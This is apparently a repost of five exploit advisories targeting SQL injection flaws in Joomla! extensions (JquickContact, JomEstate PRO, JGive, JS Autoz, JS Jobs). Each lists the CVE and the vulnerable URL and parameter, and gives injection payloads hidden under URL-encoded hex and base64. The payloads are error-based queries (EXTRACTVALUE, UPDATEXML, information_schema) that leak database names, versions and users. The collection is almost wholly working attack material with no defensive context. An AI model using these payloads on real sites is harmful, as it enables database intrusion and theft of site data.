# JTMwJTMwJTMwJTM0JTM1JTMyJTIwJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTUwJTcyJTZmJTYzJTY1JTY0JTc1JTcyJTY1JTJhJTJmJTIwJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTQxJTZlJTYxJTZjJTc5JTczJTY1JTJhJTJmJTIwJTI4JTY1JTc4JTc0JTcyJTYxJTYzJTc0JTc2JTYxJTZjJTc1JTY1JTI4JTMwJTJjJTJmJTJhJTIxJTM1JTMwJTMwJTMwJTMwJTYzJTZmJTZlJTYzJTYxJTc0JTJhJTJmJTI4JTMwJTc4JTMyJTM3JTJjJTMwJTc4JTMzJTYxJTJjJTQwJTQwJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI5JTI5JTJjJTMwJTI5JTJkJTJkJTIwJTJk
#  
# # # #
HireHackking 
# # # # 
# Exploit Title: Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor: http://coderspirit.blogspot.com.tr/2011/07/jquickcontact.html
# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/jquickcontact/
# Download: https://sourceforge.net/projects/jquickcontact/files/latest/download
# Version: 1.3.2.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5983
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jquickcontact&task=refresh&sid=[SQL]
# 
# dnR0dGo3YXM4MzNvZDVuYTM3OWVlNDAwcDYnJTIwQU5EJTIwRVhUUkFDVFZBTFVFKDIyLENPTkNBVCgweDVjLHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpKSktLSUyMFg=
# 
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component JomEstate PRO <= 3.7 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://comdev.eu/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jomestate-pro/
# Version: <= 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6368
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jomestate&task=detailed&id=[SQL]
#  
# JTM5JTMwJTIwJTIwJTQxJTRlJTQ0JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTIwJTY2JTcyJTZmJTZkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ0JTQ5JTUzJTU0JTQ5JTRlJTQzJTU0JTIwJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM3JTY1JTJjJTMwJTc4JTMyJTM3JTJjJTQzJTQxJTUzJTU0JTI4JTczJTYzJTY4JTY1JTZkJTYxJTVmJTZlJTYxJTZkJTY1JTIwJTQxJTUzJTIwJTQzJTQ4JTQxJTUyJTI5JTJjJTMwJTc4JTMyJTM3JTJjJTMwJTc4JTM3JTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUzJTQzJTQ4JTQ1JTRkJTQxJTU0JTQxJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTc0JTYxJTYyJTZjJTY1JTVmJTczJTYzJTY4JTY1JTZkJTYxJTIxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMxJTJjJTMxJTI5JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTRjJTQ5JTRkJTQ5JTU0JTIwJTMwJTJjJTMxJTI5JTJjJTIwJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTMxJTNkJTMx
# 
# # # #
HireHackking 
# # # # 
# Exploit Title: Joomla! Component JGive 2.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://techjoomla.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/donations/jgive/
# Version: 2.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5970
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jgive&view=campaigns&layout=all&filter_org_ind_type=[SQL]
# 
# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# 2)
# http://localhost/[PATH]/index.php/more/campaigns-in-pin-display/campaigns/all/search/:?campaign_countries=[SQL]
# 
# JTI3JTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTQxJTRlJTQ0JTIwJTJhJTJmJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTJhJTJmJTI4JTMyJTMyJTJjJTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTJhJTJmJTI4JTQ1JTRjJTU0JTI4JTJmJTJhJTIxJTMxJTMyJTMzJTM0JTM1JTMxJTNkJTMxJTJhJTJmJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component JS Autoz 1.0.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/js-autoz/
# Software Download: http://joomsky.com/js-autoz-download.html
# Version: 1.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6006
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&vtype=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# 2)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&pre=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
# 
# 3)
# http://localhost/[PATH]/index.php?option=com_jsautoz&c=vehicle&view=vehicle&layout=listvehicles&prs=[SQL]
#  
# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMyJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTNkJTMxJTJjJTMxJTI5JTI5JTI5JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTU4
#  
# # # #
HireHackking 
# # # #
# Exploit Title: Joomla! Component JS Jobs 1.1.9 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: http://www.joomsky.com/
# Software Link: https://extensions.joomla.org/extensions/extension/ads-a-affiliates/jobs-a-recruitment/js-jobs/
# Software Download: http://www.joomsky.com/5/download/1.html
# Version: 1.1.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5994
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)...Everyone
# http://localhost/[PATH]/index.php/component/jsjobs/newest-jobs?zipcode=[SQL]&option=com_jsjobs&task11=view
#  
# JTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTMwJTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTdlJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTI5JTI5JTJkJTJkJTIwJTc0JTQ1JTZmJTZj
# 
# 2)...Users
# http://localhost/[PATH]/index.php?option=com_jsjobs&c=resume&view=resume&layout=view_resume&bd=1&sortby=1&ta=[SQL]
#  
# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTMyJTY1JTJjJTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTI5JTJjJTMwJTM2JTI5JTI5
# 
# # # #